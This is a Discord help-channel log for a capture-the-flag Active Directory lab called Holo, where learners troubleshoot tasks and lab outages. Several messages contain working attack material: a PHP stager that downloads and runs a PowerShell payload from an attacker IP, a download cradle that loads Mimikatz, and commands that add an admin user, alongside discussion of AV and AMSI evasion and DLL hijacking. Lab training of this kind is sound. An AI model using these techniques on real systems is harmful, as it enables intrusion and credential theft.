#holo-network

1 messages ¡ Page 5 of 1

topaz jewel
#

Just like instructed

#

But the drop down menu is empty when I go to select the listener and implant template in the launcher tab

#

I clicked on the start button, but as soon as I go back to the menu, it goes back to uninitialised

#

A reboot did the job

sterile epoch
#

@topaz jewel covenant doesn't have the best input handling so if you leave a trailing space in a field it will often crash it. If you cut and paste info like your ip address always check for that prior to hitting enter

thin arch
#

Hey guys

#

anyone here at the point to access to PC-FILESRV0

lone spruce
#

plenty of people are. Whats your question?

thin arch
#

i found the creds of 'wa...' from the previous step

#

and the we have access to the PC-FILESRV as said in the tasks ... the creds isnt working for me

lone spruce
#

they work, Ive seen some users have some weird issues with the machines just being funky

#

try various ways and protocols

#

From what Ive noticed its just a matter of messing around with syntax until it works for whatever reason

thin arch
#

ive been waiting the reset 2 times same issue , i want just to know if im missin smtn like i have the wrong creds

lone spruce
#

you probably have the right creds. Remote protocols are just funky sometimes

thin arch
#

no WinRM , im trying to login from RDP

whole falcon
#

After 3 excruciating days, I've finally pawned Hololive 😎🙌

Anyone need help, feel free to hit me up

#

Thank you @lone spruce and team for the challenge, learned alot🙌🙌

hollow steepleBOT
#

Gave +1 Rep to @lone spruce

vernal veldt
#

can someone nudge me on task 17?

lone spruce
#

Could you be a little more verbose in where you’re stuck, what you’re doing, what isn’t happening, etc

vernal veldt
#

basically cant get around one of the security options that the mysql server is running iwth

wind bobcat
#

you're not connecting to the MySQL server running on the docker container, right?

vernal veldt
#

that explains a lot....

#

ty

thin arch
#

@lone spruce yhank u for ur points , i succeed to login into the PC-FILESRV01 it was a probelm in the machine

hoary lichen
#

hi, i'm not able to reach L-SRV01, it seems to be down...

#

anyone have same problem?

lone spruce
#

What subnet are you in?

cobalt isle
#

Hi, I am in Task 47 where you have to weaponize the relay. when i try to do so i get the following error and psexec exits: [-] Error performing the uninstallation, cleaning up. had anyone the same error?

cobalt isle
#

But i am curious... did anyone stumble across this error? and what is the problem?

wind bobcat
#

I still have no idea why psexec doesn't work in the lab

#

it worked in dev

#

:u

cobalt isle
#

yeah, but no problem. now i know that impacket has more tools for rce :)

wind bobcat
#

ad is whack

cobalt isle
#

is there an AV installed on that machine?

wind bobcat
#

there shouldn't be

outer talon
#

Hi, I'm not able to reach L-SRV01

wind bobcat
#

which subnet are you ok?

#

on*

outer talon
#

And yesterday when I did reach it my shell died after a couple min

#

70

wind bobcat
#

hmm, restart the network. I haven't heard of any issues existing with .70

outer talon
#

when you ask for my subnet you mean the subnet i'm connected onto via the vpn right?

#

how do I restart the network?

cobalt isle
river cradle
#

with it you can vote for a reset on your subnet

hollow steepleBOT
#

Gave +1 Rep to @river cradle

outer talon
river cradle
#

ah, the famous .69

in that case leave the room and re-join it to get assigned to a separate subnet as .69 is a test one that is kinda broken and there are too many people there

cedar prism
#

I think most have been moved off 69 now

river cradle
#

well it still shows 24 reset votes required 😄

outer talon
river cradle
#

but yeah most were assigned to other ones

outer talon
#

I'm on 150 now but still can't connect to the server

cedar prism
#

is your network started

outer talon
#

yes

cedar prism
#

did you download new openvpn file, since you changed networks you will need a new file

outer talon
#

yes i did

river cradle
outer talon
cedar prism
#

did you update your host file

outer talon
#

yes

river cradle
thin arch
#

any hints for the DLL hijacking part ive found the vulnerable app

#

and an article talking about the exploit

#

but i think the exploitation idea / DLL needed is different

pliant sun
#

I am stuck on Task 27. Can I chat with anybody who has completed this step?

wind bobcat
pliant sun
#

after capturing the token, I try to submit it via the url and then refresh ... but I get redirected back index.php

#

any ideas?

wind bobcat
#

@lone spruce

#

iirc when you refresh the page it invalidates the token

#

iirc you just need to populate the user_token field with the one found in the session cookie

pliant sun
#

yeah.. not sure what I am doing wrong

#

I wonder if anybody else out had the same issue...

lone spruce
#

You should just submit and that’s it

#

And for every refresh of the password reset page you get a new token because you’re essentially telling the server to reset the password each time you refresh

#

so the token won’t be the same

pliant sun
#

I am using Burp and intercepting the request... After I hit "Reset"

#

I capture the user_token ...

#

I have also used it under the Cookie: field of the GET request

lone spruce
#

Have you tried not using any tools and just shoving it into the url

pliant sun
lone spruce
#

tbh the infrastructure might not like burp I don’t know, I built it, it’s janky

lone spruce
#

just shoving it into a parameter?

#

that’s not going to work

pliant sun
#

I have tried without Burp also

lone spruce
#

Yes

#

I believe it might also want a user specified as well? I can’t remember

pliant sun
#

if I do that ... It will redirect me to a page where I can reset the password of the user... is that intended? I dont want to do something that might mess it up for others.

cedar maple
#

yo uhh, after this my reverse shell commits sudoku,
any reason why?

#

I'm using a VM, bridged,btw

pliant sun
#

did u use msfvenon for the reverse shell?

cedar maple
#

nahh, this is task ...12

pliant sun
hollow steepleBOT
#

Gave +1 Rep to @lone spruce

cedar maple
#

do I have to use msf?

pliant sun
#

nah..

cedar maple
#

🤔

pliant sun
#

dm if you want ... @cedar maple

cedar maple
#

well- I did use nc rev but I'll poke around with py then

lone spruce
#

I mean you’re bypassing the password reset page

lone spruce
cedar maple
#

damn, Korone

livid shoal
cedar maple
#

well I think I'll try getting a reverse shell from attack box after few hours

livid shoal
#

if u got the votes

cedar maple
#

huh, I have upgraded shells before but this one acts weird for me
the python command does not give me a "half-upgraded" shell,so I can't really use the ctrl+z trick to upgrade it further via stty raw
any ideas?

zenith canyon
#

Have you tried python3?

eternal mortar
#

Task 43: found the vulnerable application stuck in dll hijacking i created my dll but can't overwrite existing dll

lone spruce
#

youre hijacking a non existent dll

eternal mortar
lone spruce
#

A "User" on the network will run the application

#

it doesnt specify to overwrite anything

eternal mortar
#

So Id need to add my dll in the application dir then how the application call my dll ?

#

I can't understand this step

lone spruce
#

you need to add the malicious dll to the directory where it should be in

#

in most cases the users Desktop

#

it also has to have the exact name

#

the application uses dll when it starts

#

the dll you are hijacking is called but does not exist

eternal mortar
#

Insted it calls my dll from desktop right ?

lone spruce
#

therefore when you hijack it and create it the application will call it then execute your malicious code

lone spruce
eternal mortar
#

Ok got it,

#

Thank you so much

#

Later I'll try it

cedar maple
#

Yeah,that didn't work

#

I'll try python3 in morning,and let ya know

#

I did try to find the dockerenv flag w/o that but no success

wind lily
#

Task 8: can't find the domain names of the webserver with gobuster

#

what am i doing wrong?

lone spruce
#

You’re attempting to find sub domains with a sub domain

#

It shows in the output

#

www.www.Holo.live

#

that’s way off

#

try just using the IP

limpid hollow
#

Ur trying to find the sub domain of a website. For ease of use of a scanner what do you think is the best url to supply it with? Especially as u can see it didn't strip off the www.
Learning to debug what a program or code is doing is vital to cyber security testing.

zenith delta
#

I am on the container machine, where I should be able to make a full tty shell. This command has been given to me python -c 'import pty; pty.spawn("/bin/bash")' but it doesn't work, I don't get a full tty shell

#

also /bin/bash -i or python3 doesn't work

pure saddle
#

@zenith delta try python3 -c 'import pty; pty.spawn("/bin/bash")'

zenith delta
#

Also didn’t worked for me from the initial shell.. I had to create msf payload from there I used python 3 version

pure saddle
#

Good workaround nice

hollow steepleBOT
#

Gave +1 Rep to @limpid hollow

topaz jewel
hollow steepleBOT
#

Gave +1 Rep to @whole falcon

twin karma
#

hey guys, can anyone please do a reset to holo network

glacial temple
twin karma
#

10.200.151.X

vestal furnace
#

Task 12
I found the parameter that is vulnerable to RCE thorough source code, when I tried to do the same thing with wfuzz it kept giving me the 404. I don't Understand whats wrong with my command so, can anyone help me
wfuzz -c -b ||"PHPSESSID=ut2b55qbm289jijn06b4lij6po"|| -u http://dev.holo.live/||dashboard.php||?FUZZ=ls -w Temp/test

#

The word list has only one word and I even tried this with burp intruder and it worked perfectly i.e gave me the status code 200, with variable length

wind bobcat
#

because you're fuzzing the wrong subdomain

vestal furnace
#

what

#

oh no

wind bobcat
#

lol

vestal furnace
#

Yup wrong subdomain 😅

zenith delta
#

Task 21 Cracking all the things, I need to crack a sha512crypt hash. I use the following command hashcat -m 1800 hash2 /usr/share/wordlists/SecLists/Passwords/Leaked-Databases/rockyou-75.txt

#

I am not able to crack the hash

pulsar field
zenith delta
#

I am using that now ; ) but I already wait like 5mins

#

@pulsar field

pulsar field
zenith delta
#

dammm

#

I will wait about that time too then haha, thanks

lone spruce
#

Tis why we suggest colabcat

livid shoal
thin arch
#

RDP on PC-FILESRV down ?

lone spruce
#

is it closed on an nmap scan

#

if not then no

#

check your syntax

#

if its still not working move to another protocol

verbal bramble
#

The nmap scan isn't working for me, all hosts on the network are down , Am i doing something wrong or is it a bug ?

thin arch
#

proxychains xfreerdp /u:XXXXX /p:'XXXXXXX' /v:10.200.142.35

#

but not anymore

lone spruce
#

I dont know, reset the network

thin arch
#

1/3 need 2 more votes if anyone here has the same prob reset plz

lone spruce
#

you get one reset every hour

#

it is also helpful to note what subnet youre on

thin arch
#

the same state i had yesterday everythng looks the same and it was working smoothly

#

but not today

#

im almost at the point of finishing the room one flag left

vestal furnace
#

I cant access the holo network for some reason, can anyone help me?

real talon
#

Hey guys I am facing an issue with socks4 part and proxychains

#

It worked nicely while wreath

real talon
real talon
vestal furnace
lone spruce
real talon
low tree
#

Hy everyone ! I'm trying to privesc using SUID on the "L-SRV01" but when i follow the instruction on gtfobins, they tell me to set the passwd for the user "www-data" but i didn't have the passwd for this user. So maybe i miss something ? any Hint? (task 19)

lone spruce
# real talon

They’re windows boxes they don’t respond to ping

lone spruce
#

There are multiple on that page

#

It sounds like you’re attempting to use the sudo exploit

low tree
real talon
lone spruce
#

Could you send the exploit in spoilers here?

low tree
lone spruce
#

You’re attempting to copy and paste an exploit without any idea what it does

#

look at the exploit

#

understand what’s it doing

#

you have an entire line that isn’t needed

low tree
#

Ok, thanks for the help ! i'll try harder

cedar maple
#

ugh I'm stupid,
what's the reason that my term won't go ahead with reset after stty raw -echo and then fg, any ideas?

lone spruce
#

I had that happen the other day and I really don’t know

#

Ah I know why

lone spruce
cedar maple
#

now, to find the damn SRV02 flag

woven lava
#

Can anybody help me with AV evation?

#

I understand ASMI now (I guess?)

#

But I don't understand how to compile ThreatCheck

#

Or use grunts

#

Or use Covenant

#

And the walkthrough is kinda rusty

woven lava
#

Anyone who has completed Holo and is open to DMs?

foggy crest
#

Problly saupki-chan

#

Or cry

woven lava
#

I better wait for Saupki to come online

foggy crest
#

Cry == cryillic psyDuck

woven lava
#

Oh 👉 👈

#

@lone spruce @wind bobcat anyone open to DMs blobheart

grand estuary
#

L-SRV01 down?

high salmon
#

L-SRV01 certainly appears to be dead on my network, but apparently I've joined the test network on 10.200.69.1/24 and am unable to escape to a normal network

#

Been a bit of a rocky experience so far, anyone got any suggestions on how to proceed?

woven lava
#

Well it's because people nuke the initial webserver. Go for a reset. That's the only way out guess.

high salmon
cedar maple
woven lava
#

26 people kekw

high salmon
pulsar field
lone spruce
lone spruce
high salmon
lone spruce
#

That’s wacky

#

should’ve put you into a new subnet

#

Did you join before it was publicly launched?

high salmon
#

I'm not entirely sure, it's possible as I've been testing the network for use at work, Skidy might have joined me to the network before release but it'd be best to confirm that with him

#

I had previously left .69 a day or two ago, but attempted to join Polo on his network and got dropped back into .69 and was trapped there

woven lava
woven lava
hollow steepleBOT
#

Gave +1 Rep to @pulsar field

woven lava
#

How do I compile the ThreatCheck 🙂

wind bobcat
pulsar field
woven lava
#

Aah thanks. I didn't know that 😄

wind bobcat
#

ex. SMBGrunts are listeners that communicate over smb

woven lava
#

I need to start working on my WIndows skills this fall

#

@wind bobcat any good resources to get started with windows for a beginner?

foggy crest
#

Let me know biggus if u get some. I heard some itprotv courses are good

#

And here is something I found but the links to windows resources are borked

#

https://github.com/DFIRmadness/5pillars/blob/master/5-Pillars.md

lone spruce
woven lava
#

Yeah but my Dev environment is very very shitty. Nevermind, I'll figure out something

lone spruce
#

What do you mean shitty

#

you can pretty much run vs on anything

#

I’ve compiled shit on my beat up who knows how old laptop that doesn’t work half the time

livid shoal
#

:)

thin arch
#

Re-Ping

#

PC-FILESRV01 down ?

#

i have no more access to it

#

even after reset

thin arch
#

if anyone can check plz

lone spruce
#

We can’t really just check if a machine is up or down

#

are you trying to ping it?

#

If so it’s probably not going to work because it’s a windows machine

#

it’s also behind a pivot so make sure your setting up your proxy

dapper idol
#

Hey everyone

#

Having some issue connecting to the webpage ad.....live is there an issue with the docker?

upper rock
dapper idol
#

yep

#

i can see the page i was able to do a reverse shell but lostmy connection

wind bobcat
#

@high salmon if you try leaving and rejoining you should be put in a new network

tidal rune
# dapper idol yep

same happend with me also i just left it for some time , its working fine now

#

any one active here ?

#

@wind bobcat

wind bobcat
#

pong

tidal rune
#

iam in task 20

#

i got this error

#

Unable to find image 'alpine:latest' locally

wind bobcat
#

pebcak

tidal rune
#

can you help me out

wind bobcat
#

read what the command is doing

#

don't just copy and paste it

tidal rune
#

okok

zenith delta
#

can someone dm me i need some help with task 18

dapper idol
#

Bleep bloop encoder url your ncat commande from what i can see.

zenith delta
#

huh

#

nvm i figured it out i forgot to edit the ip in the bash file lmao

grand estuary
#

hmm L-SRV01 down again.

#

intresting.

livid shoal
#

you cant ping it if thats what u mean

royal merlin
#

good day guys

#

i have trouble with subdomain enum. Trying to fuzz with gobuster but nothing's found. Anyone who had the same?

wind bobcat
royal merlin
#

sure

#

gobuster vhost -u 10.200.161.33 -w /opt/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -t 35

wind bobcat
#

I can tell you i immediately see a problem with your command

royal merlin
#

what's the problem

wind bobcat
#

domain name > ip address 😉

royal merlin
#

there were no domain names for the ip address mentioned

wind bobcat
#

take a peak at L-SRV01 and poke around

royal merlin
#

i tried configuring holo.live as the domain name in /etc/hosts but it did not work

wind bobcat
#

how do you mean it didn't work?

#

the answer to T9Q1 is what needs to be in /etc/hosts, not holo.live

royal merlin
#

it found like 2 vhosts but when i tried to check them it did not work

wind bobcat
#

again, how do you mean it didn't work?

royal merlin
#

like their port 80 was down

wind bobcat
#

that shouldn't be the case. they're all running off of the same server

royal merlin
royal merlin
wind bobcat
royal merlin
#

yes! funny thing is when i try to enter the web server with the domain name 'holo.live' it just doesn't show up

wind bobcat
#

and how is your /etc/hosts file formatted?

#

it should look like so
||10.200.161.33 www.holo.live admin.holo.live dev.holo.live||

royal merlin
#

dang, why www.holo.live instead of holo.live? I think I have a gap in that area

wind bobcat
#

the primary domain name holo.live is reserved for the domain controller

#

it's like that in all AD environments

royal merlin
#

oh so www one is for the webserver , gotcha?

wind bobcat
#

correct

royal merlin
#

thank you so much!

wind bobcat
royal merlin
#

hey there

#

anyone having a trouble getting a reverse shell at t13

#

solved in already

dapper idol
#

Can we retake the room after it is finished?

glacial temple
dapper idol
#

ty

vapid lion
#

Is the holo network access limited to 10 day only.. can i use it after 10 day

night widget
#

anyone else having issues trying to access the network?

foggy crest
#

~~is network up and running. is vpn good and connected? ~~ just to be sure

night widget
#

yessir

#

hopefully i didn't dox my public ip but

glacial temple
vapid lion
hollow steepleBOT
#

Gave +1 Rep to @glacial temple

dapper idol
#

For the docker escalation,?

#

Question do we have a lab where i can work on for that part? like Docker rodeo?

vapid lion
lone spruce
hollow linden
#

@lone spruce

lone spruce
#

It’s already fixed stop ponging me

shell robin
#

Hi i am doing holo netwrok and on task 9 i have completed the vhost discovery part using the seclist wordlist which was recommended but still did not get the two domains

#

using gobuster

lone spruce
#

can we see the command you used?

shell robin
#

opps i saw the old chat and i realised my mistake

fading jungle
#

well, in task 8 there is a nmap -sV -sC -p- -v 10.200.x.0/24 --min-rate 5000 command and before it is stated that 10.200.x.0/24 is in scope - how should I interpret the x?

wind bobcat
twin karma
#

Hello, can any one help me in the AV Evasion section, i have some questions about it 🙂

manic onyx
lone spruce
#

How the hell?

#

I know I didn’t place that many errors there

#

@outer junco this wouldn’t happen to be on your dev side would it?

#

@wind bobcat you do something?

manic onyx
#

@lone spruce I also want to report a bug, i don't know if its from my part. After getting the first shell from the admin page everything is great but if that shell is stopped admin.holo.live won't work until the network is reset.

#

i can do a video on it after the network resets if you want

#

after login the admin page is in an infinite loading loop

wind bobcat
lone spruce
#

That sounds like an @wind bobcat problem

wind bobcat
manic onyx
#

works! thanks

lone spruce
#

Ah forgot about that

fading jungle
manic onyx
#

for future users:
When getting the second shell don't forget to put the "python3 -c "import pty;pty.spawn('/bin/bash')" even if the terminal shows who you are and you don't think u need it

#

I spent 2 hours on the suid with the (no tty) error

#

dont be dumb like me

fading jungle
#

hm, also I did have Nmap scan report for 10.200.169.33 [host down] but the correct first answer is 33 for the last octet (for me it was 250 one that is up)

#

maybe I'm doing something wrong

wind bobcat
#

the IP Addresses referenced in the diagram (see screenshot) is the scope for the network. Yours will be different. user subnet != network subnet

fading jungle
wind bobcat
#

if the host isn't responding

  1. Try resetting the network. You can submit additional resets every hour
  2. Leave and rejoin the room. You'll likely get placed in a new network
fading jungle
#

hm, ok - but what about other host that I've discovered (.250)? is it a part of network? maybe in my network it is just under different IP?

lone spruce
#

That’s not how it works

#

it’s a VPN gateway

#

it’s out of scope

fading jungle
#

well, I'm gonna then reset or change the network later then

#

thanks 😉

verbal bramble
#

Hello, I'm at task 13 where im fuzzing for parameters and i used wfuzz and got results as well the output is way too long is there a way for me to refine it ? --sc is not working right for me

#

i used --sc 200 but none of the outputs were right or matched the answer in the answer field

real talon
#

Hey man I have an issue with uploading mimikatz.exe using the upload feature on covenant

#

I think AV is doing something something with it

real talon
#

Please ignore this message as I changed pass disabled av and did it that way and brought the av up after I am done

lone spruce
#

That works for now

real talon
#

I screwed it over

#

My hash got screwed

lone spruce
#

but just a note if you’re looking to write a report we’re not looking for “I turned off AV” we’re looking for the most unique approaches to getting around AV

real talon
#

I am not going for any reports

#

I changed the password and now the hash is not working any more

lone spruce
# verbal bramble

This isn’t my forte so correct me if I’m wrong but have you tried getting rid of the ls la?

verbal bramble
#

yup i've tried other commands like whoami, uname ,echo etc the linux shell commands works just fine but the tool doesn't give the proper result

real talon
#

@lone spruce can I dm you

real talon
#

Can somebody verify my hashes

#

I have the hashes dumped using mimikatz and now struck

#

As spraying does not work

lone spruce
#

Why are you spraying hashes?

#

I mean I can’t say I’ve memorized the entire attack path but I don’t remember password spraying?

lone spruce
real talon
#

With crackmapexec

real talon
#

@wind bobcat Hey I am struck at the part of crackmapexec pass the hash section

#

I have changed the password of Administrator on S-SRV01 and disabled AV does changing the password screwed it up

wind bobcat
#

that's Cry's section.

real talon
#

Can you please vote reset on my instance

wind bobcat
#

I cannot

#

I do know that you don't need a Admin hash, you need a domain users hash

real talon
#

Okay but that does not work can I dm you the hashes to verify if its correct

wind bobcat
#

The hash that you get should be correct. It's loaded into memory via autologon via a password we explicitly specified.

#

in Mimikatz if you do a sekurlsa::logonPasswords, you should probably see the cleartext password someplace in there

#

and for future reference, you always want to add a user account during an engagement. Never change the password.

net user newuser Password123! /add
net localgroup Administrators /add newuser
real talon
#

Yeah I was like very desperate at that moment and it slipped out of my mind

#

And Now, I want to die as for like 3hours I was copying the SHA hash instead of NTLM

verbal bramble
lone spruce
#

@wind bobcat ree spooks this is you

wind bobcat
#

you are specifying the cookie though, right?

wind bobcat
lone spruce
#

No cookie for you

woven lava
#

Hi people, need a little help here

#

I created this payload for the file upload on S-SRV01

#
<?php
  function get_stager() {
    $init = "powershell.exe";
    $payload = "Invoke-WebRequest http://IP/rs.ps1 -outfile rs.ps1"; // Insert PowerShell payload here
    $execution_command = "shell_exec";
    $query = $execution_command("$init $payload");
    echo $query; // Execute query
  }
 function execute_stager() {
  $init = "powershell.exe";
    $payload = ".\rs.ps1"; // Insert PowerShell payload here
    $execution_command = "shell_exec";
    $query = $execution_command("$init $payload");
    echo $query; // Execute query
 }
  get_stager();
  execute_stager();
  die();
?>
#

The file uploads successfully but isn't executed

#

Not even the request is made

#

Any guesses what I am doing wrong?

pulsar field
woven lava
#

I tried SERVER/db-shell.php but nothing

wind bobcat
#

has Powershell reached out to the web server?

#

by to the web server, I mean yours

woven lava
#

Not really

wind bobcat
#

so no?

woven lava
#

Nevermind, I was requesting the wrong path

#

But the revshell payload failed

#

I used Chimera

pulsar field
#

If the reverse payload failed, maybe try with AMSITrigger if its detected from AMSI as malicious

woven lava
#

I used level 4 obsfucation in Chimera, lemme try that again

lone spruce
#

usually just obfuscating it wont fully bypass defender

#

it can but you have to craft a decent payload

#

also as always we suggest checking that the payload works on your own host before just going and blowing it on the production server

#

if the payload itself doesnt work then its not going to work in the PHP

verbal bramble
hollow steepleBOT
#

Gave +1 Rep to @wind bobcat

woven lava
#

Is it "legal" in the Pentest report if I disable ASMI altogether?

lone spruce
#

there are no restrictions per say to the report

#

were just looking for the most unique ways of evading detection

#

ideally you are as quiet as possible and stealthy

#

so disabling AMSI would not be recommended

real talon
#

The event logging and av product

#

I ran sharpedr

#

But can't find a thing to fit the answer

lone spruce
#

its sysmon

#

I blame spooks

real talon
#

Are you kidding me mate

#

4 chars av product

#

I know its Windows Defender

lone spruce
#

thats on the device

#

I know that for a fact

woven lava
#

So I am trying to get Mimikatz on the machine with

IEX (New-Object System.Net.Webclient).DownloadString("http://IP/Invoke-Mimikatz.ps1")

But not even the request is being made

#

Any ideas what I am doing wrong?

#

PS: I can download other stuff, just this particular one errors out

#

Okay, nvm I changed the name and it worked

woven lava
#

Still can't get mimikatz up

#

Low-key wanna kill defender

woven lava
#

Wrong channel dude

mystic sparrow
#

Yeah I just realised lol idk how I ended up here

#

Sorry!

woven lava
#

Anyone who successfully dumped LSASS creds?

keen venture
#

Hi, on task 10. Fairly confident I have found the file that loads images for the dev domain. It's an empty file though. Guessing someone is playing silly buggers. Any admins that can restore? Or do I need to get the votes to reset?

#

I think it could be needed for task 12, what file from the information leak?

#

If not I will keep searching?

wind bobcat
woven lava
#

@wind bobcat !!!! Be my savior

wind bobcat
#

Cry is responsible for the middle of the network

woven lava
#

How do I dump LSASS creds pepehands

wind bobcat
#

sekurlsa::logonPasswords

woven lava
woven lava
#

It's removing all mimikatz things

wind bobcat
woven lava
#

I guess the box doesn't have python

keen venture
wind bobcat
#

it's not a local tool, it's a remote tool

wind bobcat
#

don't worry about spoilers since this is a guy did not work

woven lava
#

Ughh but doesn't secretsdump require some sorta creds?

wind bobcat
#

guided* speech to text ftw

wind bobcat
#

if you have local admin access, you can create a local admin

woven lava
#

The Cycle of Life

keen venture
wind bobcat
#

you're missing a parameter.

#

that's why lol

#

go look at the actual images that are loading on the web page

keen venture
#

Roger 😂

#

I was reading it wrong 🙈 I was hoping for a topology

woven lava
wind bobcat
#

you really don't kekw just clean up after yourself

#

if you want to be extra

#

dump the lsass process and parse it manually offline

woven lava
#

Aah sure

wind bobcat
#

but that's work

#

i would just create a local admin, dump creds, remove the user, and be on my way.

woven lava
#

I wanna write a good report for the Pen-300

#

@wind bobcat you there?

wind bobcat
#

hm?

lone spruce
#

@woven lava it helps if you be more verbose in your questions rather than please help defender Bork. Specify what you’ve tried, where youre stuck, etc

woven lava
#

I have tried:

  • The Mimikatz Binary(which gets removed)
  • The Mimikatz Powershell script(which isn't invoked)
  • I've tried various obfuscation methods but all failed(Including CustomKatz)
#

I tried adding another user but am pretty sure the syntax is wrong somewhere when using secretsdump.py

lone spruce
#

Have you tried following the course guidance?

#

The same steps taken to evade with covenant can be used on any tool

#

Have you tried researching evasion techniques

woven lava
#

I used Chimera because Covenant was too complex for me.

#

And yes, I tried researching tools and even tried a bunch of them

lone spruce
#

Seems like you really just need to reread over the tasks and do some more research

#

not a lot we can do for you

dire inlet
#

I Just dump lsass with rundll32 + a dll I forgot (it’s on hacktricks) and sam/system with reg save to an smb server on my Kali and call it a day

woven lava
lone spruce
#

You’ve got time don’t worry about running through it super fast

#

take your time and pick up on some new concepts

#

This is a perfect primer for Pen-300

wind bobcat
#

I'd say most of what you're doing here is harder than pen-300

gleaming eagle
#

when was this network released

wind bobcat
#

soft released 2~ weeks ago

#

official release, 2 days ago

woven lava
#

This might be be stupid

#

But when I add a user(Assume username to be db) it is listed as:

.......
HOLOLIVE\matt
db
.......
#

What does HOLOLIVE signify?

#

And how do I add my user to the group?

lone spruce
#

Holo live specifies the domain

#

And a decent google question

#

TLDR you don’t have permissions because you don’t control the domain

woven lava
#

Aah that might explain why I can't use secretsdump

#

Just a side Question: Disabling Defender is a lot of noise, so how about excluding a particular folder? Is that stealthier somehow?

#

(If I delete it later)

lone spruce
#

We’re looking for unique approaches not the easy way out

shell robin
#

Hi All i need small hint/ help about task 15 i have got the shell and now according to the task i have to sumbit flag but i am unable to do so

#

little confused because there is nothing in home directory

fading jungle
#

ok so me again - now that .33 server responds - so what that x means in 10.200.x.0/24? yesterday I've performed an nmap scans using bash for loop (nmap 10.200.0.0/24, 10.200.1.0/24, 10.200.2.0/24, etc) - but maybe I should know what x is at this time

potent hound
#

Hey, can we vote for resetting the network? I messed up with stabilizing the shell 😦

fading jungle
#

wait a bit 😛 i'm running that massive scan

fading jungle
#

another question: does it mean after few days I won't be able to complete it? or is it only counting my premium membership?

potent hound
#

@fading jungle is your premium membership expire in 8 days?

fading jungle
#

ok I'm fine with resetting you can do that

potent hound
#

I'm pretty sure we're on different networks 🙂

#

if that's even possible

real talon
#

Can someone help me on the dll hijacking??

hollow linden
#

Its better to ask your question specifically @real talon

real talon
#

I can't do the dll hijacking

#

@hollow linden I could show you what I have found so far

#

This is all I found

#

This is all i have got

#

Now I made a dll using covenant and renamed it to a the not found dll and put that thing at the place of the binary @wind bobcat

zenith delta
#

Hello guys! I have a bit of a road block for the fuzzing part. I am using gobuster for the vhosts scan on the attack box with the /etc/hosts/ edited to have 10.200.175.33 FQDN but all i get at the end of the scan is garbage.......I am looking for
What domains loads images on the first web page? and used the following command gobuster vhost -u FQDN -w (the recommended one). Any idea as to what i am doing wrong?

fading jungle
#

and are you sure that IP address is ok? I'm just asking because you can be at later task or I don't know sometihng

wind bobcat
real talon
wind bobcat
#

:L

pulsar field
real talon
#

That yet does not work

#

Can I dm you ??

pulsar field
manic onyx
#

i've been waiting for 10 minutes and i cant find anything useful on the internet

#

any ideas?

night widget
#

you can run it with dotnet run --project=/path/to/folder

manic onyx
#

i figured i had to build it first, and that doesnt work aswell

night widget
#

do you have the sdk's installed?

manic onyx
#

yes, look at the first commands

night widget
#

hmmm

#

ur already root but maybe try sudo?

manic onyx
#

tried that now, but it seems im still in an infinite loop

#

maybe i ll just use empire lol

lone spruce
#

this is the source of the problem

manic onyx
#

if i try to open the 127.0.0.1:7443 in a browser it doesnt work

lone spruce
#

Why are you using 3.1.4?

pulsar field
#

Are there any good Resources to "obfuscate" DLL?

manic onyx
lone spruce
#

Think of your dll no different as you would your payload

manic onyx
#

to SDK 3.1.411

lone spruce
#

No

#

It directed to a 3.0.x download site

lone spruce
manic onyx
#

am i doing something wrong?

lone spruce
#

Yes

wind bobcat
#

it does say 3.1 on the task, Cry

lone spruce
#

It says 3.1.0

manic onyx
#

look at the video

wind bobcat
#

hmm, I see

#

yeah, you need to scroll down on the page

lone spruce
# manic onyx

Scroll down. Do you always just look at a site and click the first flashy button you see

wind bobcat
#

its all the way att eh bottom

zenith delta
pulsar field
manic onyx
#

when its about downloads, yes lol

lone spruce
#

I would prefer we stay here it’s easier for my sanity and to help others

#

@wind bobcat I need to go back to bed and wake up less grumpy

#

Send nana pics

wind bobcat
lone spruce
#

Wait

fading jungle
lone spruce
#

spooky my dog has the same collar and leash

wind bobcat
#

hhHhh

lone spruce
#

they differ

fading jungle
#

@zenith delta also as long as I'm not mistaken *.175.* is not a correct ip for that part - did curl 10.200.175.33 returns you anything?

lone spruce
pulsar field
fading jungle
#

I have a question for sb here, about fuzzing - can I DM someone?

fading jungle
lone spruce
#

there are a bunch of subnets

fading jungle
#

probably different subnets for different ppl

hollow steepleBOT
#

Gave +1 Rep to @fading jungle

fading jungle
#

I want to talk a bit about fuzzing binary responses

real talon
#

Now, This is happening @wind bobcat

night widget
#

So i uploaded the the php wrapper, but it doesn't show up in covenant after executing the file

wind bobcat
#

if you type in socks do you have any sessions?

#

and you can access 10.200.151.30 without any issues?

#

connection reset typically means you cant

lone spruce
#

did you test your payload on your local testing machine prior to just throwing it up

night widget
#

yes, had to modify the profiles and such because threatcheck detected it

lone spruce
#

just becuse threat check says its clean doesnt mean it is fully

#

did you actually test against defender?

night widget
#

no, let me try that

lone spruce
#

there is one specific function that typically gets picked up but threat check doesnt see it

night widget
#

defender didnt find anything

lone spruce
#

How did you write your wrapper

night widget
#

i had to add a GIF-header to my php file because the webserver errord whenever i tried uploading it without that header

#

waiit lemme grab it

lone spruce
#

that’s probably going to be your problem

#

I suggest looking at other ways to bypass it

#

there is a section in the room depicting what to do if you’re not sure

night widget
#

aah ok will look into it!

#

thanks 😄

modern vigil
#

?

wind bobcat
#

?

lone spruce
#

?

zenith delta
#

?

upper rock
#

?

woven lava
#

?

#

Btw, I cracked the hash of the user on S-SRV01. However Task 37 asks for a hostname and a flag, and I couldn't figure out either

#

Any help?

#

I can't seem to get on Fileserver01

wind bobcat
#

that's because it's not fileserver01

woven lava
#

I can't seem to get on Fileserver01

#

I've tried spraying but to no avail :(

woven lava
#

But then, how do I get on FILESRV01?

zenith delta
#

What is the full path of the credentials file on the administrator domain? Can someone DM me the gobuster command for this please?

wind bobcat
#

you've compromised S-SRV01, right?

#

like, dumped credentials and all?

woven lava
#

Yes.

#

I am all done till task 36

#

Now, when I spray the network with the credentials, only S-SRV01 is successfully pwned

lone spruce
woven lava
#

@lone spruce can I DM you a question? It got certain spoilers otherwise I would have dropped them here.

#

I'll take just a minute.

shell robin
#

Hi

#

admin.holo.live is not working i am using right creds

#

can someone help

wind bobcat
#

what creds are you using?

shell robin
#

or at least check if it is issue on my side

#

DBManagerLogin!

#

admin:DBManagerLogin!

wind bobcat
#

that should work. Best advice I can give is to reset the network

shell robin
#

reset network votes are not enough

wind bobcat
#

you get one reset every hour

shell robin
#

okey thanks i guess wait is best option

wind bobcat
#

if you'd like to explore an additional exploitation path, the dev subdomain is also vulnerable to RFI

fading jungle
#

